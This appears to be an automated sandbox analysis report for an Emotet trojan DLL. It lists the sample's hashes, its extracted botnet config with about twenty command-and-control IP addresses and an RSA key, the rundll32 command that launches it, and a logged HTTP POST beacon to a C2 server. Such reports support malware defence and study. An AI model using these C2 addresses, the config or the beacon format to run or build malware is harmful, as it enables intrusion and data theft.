Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    135s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    11/09/2024, 18:21 UTC

General

  • Target

    daf54255b8dd982cd71051a78d62f4fa_JaffaCakes118.dll

  • Size

    330KB

  • MD5

    daf54255b8dd982cd71051a78d62f4fa

  • SHA1

    3ae8e73cc44b480d6810be47a718d98eb28f94df

  • SHA256

    0057e700df980654431d80a7caa0c4fbc568172823f236f2ef0acb01c8740324

  • SHA512

    15441892ea0b099eba95189bb3a8c2dc0cc379220721fc361145fed88a482c054bf476d631f5612141ecd6e222dcca101c81bd4fcf91ab07391d70e30ecf409c

  • SSDEEP

    3072:9Rq1sFAd2gQ5PmBvNZwnnq1gn2RvoXiDzAYgrO1v2F5j81qc:3q1sFAwgwmBv3wnIgG4oAYxvU54gc

Malware Config

Extracted

Family

emotet

Botnet

Epoch3

C2

190.55.186.229:80

203.157.152.9:7080

157.245.145.87:443

109.99.146.210:8080

116.202.10.123:8080

172.96.190.154:8080

163.53.204.180:443

190.107.118.125:80

91.93.3.85:8080

185.142.236.163:443

115.79.195.246:80

120.51.34.254:80

192.210.217.94:8080

198.20.228.9:8080

91.75.75.46:80

54.38.143.245:8080

161.49.84.2:80

162.144.145.58:8080

178.33.167.120:8080

201.193.160.196:80

rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ
3
cMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j
4
l32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB
5
-----END PUBLIC KEY-----

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Blocklisted process makes network request 9 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\daf54255b8dd982cd71051a78d62f4fa_JaffaCakes118.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2204
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\daf54255b8dd982cd71051a78d62f4fa_JaffaCakes118.dll,#1
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      PID:1724

Network

  • flag-sg
    POST
    http://157.245.145.87:443/7r6sz/9a1nc6v/u3uptv1p/9mr1gcm/63q8fppz1mxk4/h3kida/
    rundll32.exe
    Remote address:
    157.245.145.87:443
    Request
    POST /7r6sz/9a1nc6v/u3uptv1p/9mr1gcm/63q8fppz1mxk4/h3kida/ HTTP/1.1
    DNT: 0
    Referer: 157.245.145.87/7r6sz/9a1nc6v/u3uptv1p/9mr1gcm/63q8fppz1mxk4/h3kida/
    Content-Type: multipart/form-data; boundary=---------23zxW27BD
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: 157.245.145.87:443
    Content-Length: 6084
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://157.245.145.87:443/7r6sz/9a1nc6v/u3uptv1p/9mr1gcm/63q8fppz1mxk4/h3kida/
    Cache-Control: private, no-cache, max-age=0
    Pragma: no-cache
    Server:LiteSpeed
    Content-Length: 0
    Connection: Close
  • 190.55.186.229:80
    rundll32.exe
    152 B
    3
  • 190.55.186.229:80
    rundll32.exe
    152 B
    3
  • 203.157.152.9:7080
    rundll32.exe
    152 B
    3
  • 203.157.152.9:7080
    rundll32.exe
    152 B
    3
  • 157.245.145.87:443
    http://157.245.145.87:443/7r6sz/9a1nc6v/u3uptv1p/9mr1gcm/63q8fppz1mxk4/h3kida/
    http
    rundll32.exe
    6.3kB
    576 B
    8
    8

    HTTP Request

    POST http://157.245.145.87:443/7r6sz/9a1nc6v/u3uptv1p/9mr1gcm/63q8fppz1mxk4/h3kida/

    HTTP Response

    301
  • 157.245.145.87:443
    tls
    rundll32.exe
    716 B
    1.8kB
    9
    7
  • 109.99.146.210:8080
    rundll32.exe
    152 B
    3
  • 109.99.146.210:8080
    rundll32.exe
    152 B
    3
No results found

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Cab6D55.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • memory/1724-0-0x0000000000170000-0x000000000018F000-memory.dmp

    Filesize

    124KB

  • memory/1724-1-0x0000000010000000-0x0000000010023000-memory.dmp

    Filesize

    140KB

  • memory/1724-2-0x0000000010000000-0x0000000010023000-memory.dmp

    Filesize

    140KB

  • memory/1724-3-0x0000000010000000-0x0000000010023000-memory.dmp

    Filesize

    140KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.